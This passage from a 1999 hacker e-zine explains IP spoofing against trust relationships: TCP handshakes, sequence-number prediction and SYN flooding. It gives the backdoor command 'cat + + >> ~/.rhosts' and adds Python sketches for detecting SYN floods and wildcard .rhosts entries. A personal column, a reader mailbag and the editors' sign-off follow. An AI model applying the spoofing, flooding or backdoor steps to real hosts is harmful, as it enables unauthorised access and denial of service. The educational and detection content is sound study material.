partial knowledge of TCP and IP protocols. But if you don't
there are references to some essential reading at the end.
 The one serious drawback to IP spoofing trust-related exploits
is that the initial attack is blind. Since you are impersonating
another server, you will be unable to accept any response from
the server under attack.

 Establishing a Connection

 TCP is the most widely used connection-oriented transport
protocol in the TCP/IP suite: it lets co-operating computers share
a reliable byte stream across a network. Connection-oriented means
that the two hosts involved must first establish a connection by
way of a 3-way handshake. All the 3-way handshake does is set up
the state needed to transfer data. The sequence numbers of both
hosts are exchanged so that a connection can be created. This
3-way handshake makes TCP harder to spoof than simple IP packets,
because the attacker has to supply the right acknowledgement
number without ever seeing the other side's reply.
 The connection handshake is as follows;

       X       ---SYN--->      Y
       X      <--SYN/ACK--     Y
       X       ---ACK--->      Y

 To begin with, host X sends a TCP segment with the SYN flag to 
Y. This tells host Y that a connection is about to be set up.
The sequence number that X sends is its ISN (initial sequence
number) for the connection. Host Y replies with its own ISN, with
both the SYN and ACK flags on; the acknowledgement number in that
segment is X's ISN plus one. X then ACKs Y's ISN plus one, and
communication can take place.

 The Sequence Number

 TCP is marketed as the reliable internet protocol. It accounts 
for all packets, resends lost packets and rearranges out of order 
data. The sequence number is used so that the other host can 
acknowledge receipt of the packet. The receiving end uses the
sequence number to ensure proper ordering of the data and to
eliminate duplicate data bytes.
 Sequence numbers are simply 32-bit variables. They range from 0
to 4,294,967,295.  Each packet sent across a TCP connection is
sequenced. TCP uses the concept of window advertisement for flow
control. The sliding window tells the other end of the connection
how much data can be buffered, the window size is 16-bits so a
receiving host can advertise up to a maximum of 65535 bytes. This
process can be thought of as a means to ensure that neither host 
begins to transmit above the acceptable level of the other host.
 In order to spoof a connection, you must understand how sequence
numbers are chosen and how they change throughout the connection.
On the classic BSD implementations the sequence number when a host
is first booted is set to 1. The initial sequence number is then
incremented by 128,000 every second, which makes the 32-bit ISN
variable wrap every 9.32 hours if no connections occur, and
whenever a connection is established the ISN jumps by a further
64,000. An attacker who opens one real connection to learn the
current ISN can therefore predict the ISN the host will hand out
a known time later.
 This scheme exists to eliminate the possibility that data from an
old connection could arrive and damage the current connection. With
a steadily advancing ISN, a stray segment that finally freed itself
from a routing loop somewhere cannot carry a sequence number that
lands inside the new connection's window, which is why purely random
sequence numbers were avoided. Note, however, that RFC 1948 (1996)
shows how to keep the advancing clock and still make the ISN
unguessable, by adding a secret offset derived from the addresses
and ports of each connection; a host that follows it is not open to
the prediction described here.

 Other Flags

 TCP header flags include RST (reset), PSH (push) and FIN (finish).
The RST flag causes the connection to be immediately torn down. 
The RST flag is basically an in-built error message for when one
host breaks the already established rules of connection. The PSH
flag tells the receiver to send all the queued data as soon as
possible. The FIN flag is the means whereby a host naturally 
closes a connection.

 Syn Flooding

 Once the trusted host is found, it must be silenced. Since the
attack intends to impersonate it, it is necessary to make sure that
the host cannot answer any network traffic. If it received the
SYN/ACK from the target host it would reply with a RST and tear the
connection down, since it never sent a SYN.
 The best way to deny packets access to a server is to lock it up
with some form of Denial of Service attack. This is quite a complex
operation and requires much research. 
 We have seen above how TCP connections are created, and these steps
can be used to the disadvantage of the trusted host. A Syn flood is
a flood of specially crafted packets with the Syn flag set, sent
from random source addresses that will never answer (a real source
would reply with a RST and free the slot again). The trusted host
picks up each packet, thinks that a connection is about to be made
and allocates a half-open connection for it.
 By flooding the trusted server with such Syn packets it is possible
to fill up the listen backlog of the port, the queue of half-open
connections, so that further segments arriving for that port are
dropped instead of being answered. As the half-open connections time
out while the trusted server waits for confirmation, it is necessary
to fill the gap that is left. The attacker can send a fresh batch of
Syn packets every few seconds to the trusted host and keep it
occupied.
 For more information on this complex subject see the notes at the 
end of the file.
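 As an added illustration (not from the article), here is a Python
sketch of what the trusted host's side looks like while this is
going on: a constructed packet log with one honest client and a
burst of SYNs from forged sources, and a monitor that counts the
half-open entries that never complete, which is the condition a
defender watches for. The 75 second timer and the backlog size are
assumed values.

```python
from collections import Counter

# Assumed server-side timer: how long a half-open entry waits for the
# final ACK before the table drops it (a constructed value).
ESTABLISH_TIMEOUT_S = 75.0


def constructed_sample():
    """Constructed packet log as the trusted host would see it:
    (time_s, src_ip, src_port, flag). One real client completes the
    handshake; 300 SYNs from forged sources never do."""
    normal = [(0.0, "10.0.0.5", 40000, "SYN"), (0.1, "10.0.0.5", 40000, "ACK")]
    flood = [(0.2 + i * 0.01, f"198.51.100.{i % 250 + 1}", 1024 + i, "SYN")
             for i in range(300)]
    return normal + flood


def half_open(records, now, timeout_s=ESTABLISH_TIMEOUT_S):
    """Entries that got a SYN, never the completing ACK from the same
    peer, and have not yet aged out of the table."""
    pending = {}
    for t, ip, port, flag in records:
        if flag == "SYN":
            pending[(ip, port)] = t
        elif flag == "ACK":
            pending.pop((ip, port), None)
    return {k: t for k, t in pending.items() if now - t < timeout_s}


def syn_flood_indicators(records, now, backlog=128,
                         timeout_s=ESTABLISH_TIMEOUT_S):
    """Summarise the half-open table the way a monitor would: is the
    backlog full, and how spread out are the sources."""
    pending = half_open(records, now, timeout_s)
    sources = Counter(ip for ip, _ in pending)
    return {"half_open": len(pending),
            "backlog_exhausted": len(pending) >= backlog,
            "distinct_sources": len(sources)}


if __name__ == "__main__":
    log = constructed_sample()
    print("during the burst:", syn_flood_indicators(log, now=5.0))
    print("after the timer: ", syn_flood_indicators(log, now=200.0))
```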

 The Attack

 To use IP spoofing as an attack you must first choose a target 
and work out a trust-relationship that exists on that server. The
sequence numbers are calculated. The trusted server is put into 
a continual Denial of Service attack and then impersonated. The
attacker then simply issues a command to give him/her a way back
in.
 Here is a step by step outline of the attack;

 X(forged as Z)    ---SYN--->      Y
       Z          <--SYN/ACK--     Y
 X(forged as Z)    ---ACK--->      Y
 X(forged as Z)    ---PSH--->      Y

 The first packet from the attacker has the source IP address 
spoofed as Z which is the trusted host. Y responds with an Ack
of the first packet to Z, but since the trusted host Z is in
the middle of a storm of Syn packets it does not receive the 
Ack packet. 
 The attacker must pause for a moment so that the target host
Y actually has time to send the Ack packet. Then X sends its
own Ack packet with the presumed sequence number plus one since
it is the second Ack. If the calculated sequence number is 
correct then by the last stage the target host believes it is
connected to the trusted host Z and data can be sent.
 Since the attack is blind, the general idea once the trust has
been exploited is to insert a backdoor into the system. The 
simplest could be 'cat + + >> ~/.rhosts'. This is a good
idea because it is quick, allows for simple re-entry, and is not
interactive.  Remember the attacker cannot see any traffic coming
from the target, so any responses are sent off into oblivion.
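 A wildcard line like that is exactly what a defender should be
checking for. As an added example, not from the article, here is a
small parser for the .rhosts format that flags the wildcard entries;
the sample file is constructed.

```python
def parse_rhosts(text):
    """Parse .rhosts lines into (host, user) pairs. Blank lines and
    '#' comments are skipped; a missing user field means the same
    username as the local account."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def risky_entries(text):
    """Entries that remove the host check, the user check, or both."""
    findings = []
    for host, user in parse_rhosts(text):
        if host == "+" and user == "+":
            findings.append((host, user, "any user from any host"))
        elif host == "+":
            findings.append((host, user, "any host"))
        elif user == "+":
            findings.append((host, user, "any user on " + host))
    return findings


# Constructed sample: two legitimate lines followed by the wildcard
# entry the article describes as the backdoor.
SAMPLE_RHOSTS = """\
trusted.example.net alice
# nightly sync job
backup.example.net
+ +
"""

if __name__ == "__main__":
    for host, user, why in risky_entries(SAMPLE_RHOSTS):
        print(f"{host} {user or ''}: {why}")
```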

 Summary

 IP spoofing is not difficult because IP is easily forged. This
attack works because many network connections rely on source
authentication. The presumption is that source authentication is
easy and safe. It is most definitely not the latter.
The most difficult part of this attack is the sequence number 
calculation. This takes timing, skill and guesswork.

 Resources

Request For Comments:          793, 1825, 1948
IP-spoofing Demystified - Trust-Relationship Exploitation
 by daemon9 / route / infinity
 http://www.phrack.com
SYN Floods The cause and Cure
 by NeonSurge
 http://www.rhino9.org
Introduction to the Internet Protocols
 by The Computer Science Facilities Group
 http://homepages.iol.ie/~cronus/ip/info70.txt
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Ask Dr. Klep - "Kleptic's Views":
 kleptic@grex.org

Well, this text is just about what I've been thinking about
lately. I've been thinking about many topics, some important, 
some not.. like "Why do you press harder on your remote 
controller for your TV when you know the batteries are dead" 
or "What would a chair look like if your legs bent the other 
way!?" and the most important, "If a tree fell in the woods 
and no one was around to see it, would the other trees make 
fun of it!?" Those are the not so important things I've been 
thinking about..

Yeah know what really pisses me off, all that Bill Clinton 
and Monica shit. I'm really tired of hearing about that.. and 
I'm sure all of you are too. First of all, I don't want him 
impeached, but I do think he's a jackass. Hey would you want 
Al Gore as president of the USA? I know I wouldn't. Yeah see I
don't think like most 'computer analysts' or "hackers", most
Hackers/phreaks/crackers/warez d00dz are mostly "anarchist". I 
believe in order in a country, if there wasn't any order people 
would cause havoc all the time.. and people would die. And I'm 
sure no one REALLY wants to die.

And how come older people or adults think that teenagers, or 
people in the age area of 14-21 are nothing but a bunch of rowdy 
misfits!? And that we all have nothing to do but do drugs and 
have sex? That's not all true in fact. Not all kids do drugs or 
have sex. Yeah see I live a lifestyle that most of you have 
probably heard about. It's called "Straight Edge". Straight Edge 
meaning a drugfree lifestyle, "don't drink and don't smoke"
those are the rules of today... before back in the 1980's the 
rules were "Don't Drink, Don't Smoke, Don't Fuck" The term 
"Straight Edge" was coined by Ian McKaye, the singer from a 
1980's hardcore/punk band called "Minor Threat". But I'm not 
gonna get into the history, I'm just trying to make a point.

This text is kinda short, and most of you probably don't give 
a rats ass of what I'm thinking about, but I'm just trying to 
make a point, This is the way I feel, and I personally don't 
give a shit if you think otherwise.

For the next instalment of "Ask Dr. Klep" I will need all of 
you to e-mail me questions or comments of anything in this 
text, or any other texts that I've written before, or any 
technical questions, I will answer them in the next Issue of DoJ.

Thank You,

Kleptic
kleptic@grex.org
http://wwz.net/kleptic/
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/98
::: The Discordant Opposition Journal ::: Issue 2 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Viewing Public:

 This is our mailbag. Our dirty electronic linen. Basically a
dumping ground for mail we get about the DoJ but occasionally
we will throw in a snippet that we consider humorous, scary
or just plain disturbing... Cronus recently had an article 
printed in the Print Publication of Blacklisted 411 and 
received many mails on the topic, they are answered here.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: Core <doniec@cyberspace.org>
Subject: Co-operation

I was just checking out your page and was wondering whether or
not you would like to co-operate with me in attempting to bring
about a total Boycott of Tinet in order to get them to bring 
down the phone charges?

Mail me here if you think we can work something out.

Freeman

:Its worth noting that Tinet is Telecom Internet, an ISP run by
 the main telephone company here in Ireland. And unfortunately 
boycotting them will not by any means reduce phone charges. In fact 
since my site is a hacking site, whatever you had in mind is most
likely illegal and I amn't interested, but thanks for the thought.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From portcharlottesux@hotmail.com
Subject: Mailbombs

where can i download some decent chat bombs, mail bombs, im bombs,
icq bombs, or any other progees? i would be greatly appreciative.  
e-mail me at portcharlottesux@hotmail.com

:My oh my, you seem to have a bit of an unhealthy obsession on your hands 
there, well now that you've given out your email address in these hallowed 
pages I'm sure somebody will 'help' you with your request. For the ICQ bomb 
you'll have to send us your UIN, hehe..

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "jastel marrell" <archive_@hotmail.com>
Subject: EUA

Greetings and Salutations Cronus,  

Just got done reading your article in the latest edition of 
Blacklisted 411.  Good info.  was wondering if you would be 
interested in doing similar articles for the Electronic 
Underground Affiliations E-Zine? The EUA is made up of various 
hacker org's around the world and we like to put out a monthly 
zine to keep our members informed of what's going on and what's 
new in the hacker/phreak underground.  You can find us on the 
web @ "http://members.xoom.com/xxxxxxxx/"  We've kept a low 
key for the past few for a couple of reasons, namely the events 
revolving around Kevin M. and Justin P.  But alas, that has come 
about in a manner most unwanted.  Drop me a line and let me know 
if you are up for writing a few articles for us. 

Thanks
archive

:Hi archive, I responded personally and just wanted to comment
 on your mail for our readership. I understand that you didn't 
 realise that I am editor of this Zine, but may I presume to ask
 a few questions ? Why would a European E-Zine be worried about
 the prosecution of US hackers ? And why would a Publication 
 choose for any reason to keep a low profile ? Why publish anything
 if you have to keep it low profile ? I censored your URL as you
 seemed very worried about staying low profile.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: Cigarjosey@aol.com
Subject: better reception

dear cronus       

I am a farmer and i love your articles in 411.i have an ericson 
kh668 and i wanted to hook up a external antenaa to my 80 foot 
silo. Radio shack has a filter for the phones frequencies but they 
dont have the tnc connecter. Ericsdonn wants a arm and a leg for 
their travel hook up. Can u help? 

thanks cigarjosey

:Cigarjosey, if that is your REAL name. I am not sure I know what
 you are asking. Perhaps if you asked a question like 'Can you get
 me this thing ?' or 'Where should I go to buy it ?'. Until you
 phrase your mails according to the dictates of Modern English I
 will have to simply ignore you.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "Ben Winston" <ben@thewinstons48.freeserve.co.uk>
Subject: I'm not so sure I wanna Help You Discordants

Very, very cool site.

:Hmm, yes. Nice and to the point.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "DynamikHack" <dynamikhack@geocities.com>
Subject: Wingating the Net

I read your article about using IP spoofing through Wingate 
systems.  At the end of it, it said that files such as an IP 
scanner are available on your site.  However, I can't seem to 
find them.  Can you provide me with a link to somewhere that 
I can get an IP scanner?  

thanks

:Try www.warforge.com

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From: "Kirby L. Wallace" <kirby@wallaceinfo.com>
Subject: oh yeah, one other thing...

It's nice to find others who are interested in learning for the 
sake of learning, not for the sake of playing one-ups-manship with
destructive behaviours that only prove what a moron one is.  Good 
for you.

Kirby

:Thanks for the support Kirb. You will not be forgotten when the 
 revolution comes...

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

That's about it for this issue. But keep those ridiculous questions
coming cause the next issue will award a special prize to the most
stupid mail we receive.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Conclusion:

 Well there you all are for another issue. Hope it keeps you as
enthralled as previously. We try to keep up the usual degree of
crap each issue. We are sure you lot have complaints so send
them to discordia@Rue-the-Day.net and we'll probably ignore you.

 We have some complaints of our own. We started this Zine out
of boredom and it seems that no-one is interested. Sure, we get
loads of hits on the site. Loads of people download the Zine
but, apart from abuse, rarely do we get a serious contributor.
We need, I repeat WE NEED, submissions of stories, how-to's, art,
poems, quotes, technical FAQ's, hacking texts, underground exploits
and anything else you have lying around. Unlike the swanky print
publications that you actually have to PAY for... the DoJ is free
and we need your help to keep it up.  Cronus and Rue do not intend
to write anything for the next issue. We want your help in filling
the space. 

 Much thanks go out to Kleptic and Digital Avatar for their
continued support. Thank You Guys. Ethercat has always been willing
to help and much thanks go out to her for putting up with all our
wild ideas... rOTTEN was the Original ASCII artist and for this 
issue we decided we needed a change. The new art is done by an
anonymous author, but thanks go out to carsten_bund@mediacube.de.
Also we recently got our first contribution of Digital Art to the
Gallery section of the site, thanks go out to Michael Perryman.

 Kleptic has his now regular column 'Ask Dr. Klep' and we thought
the name would be enough to inspire questions but obviously not.
Kleptic, Klep to his friends, is a very well rounded underground
figure and is willing to answer all your questions, even the ones
your parents would never answer growing up. So mail him your deep
underground questions and he'll sort you with an answer...

 So till next time Folks. Same Discordant Time, Same Discordant
Channel. 

 'Be Safe, don't get caught with your pants down...'
  - President William Clinton.

 The Editors.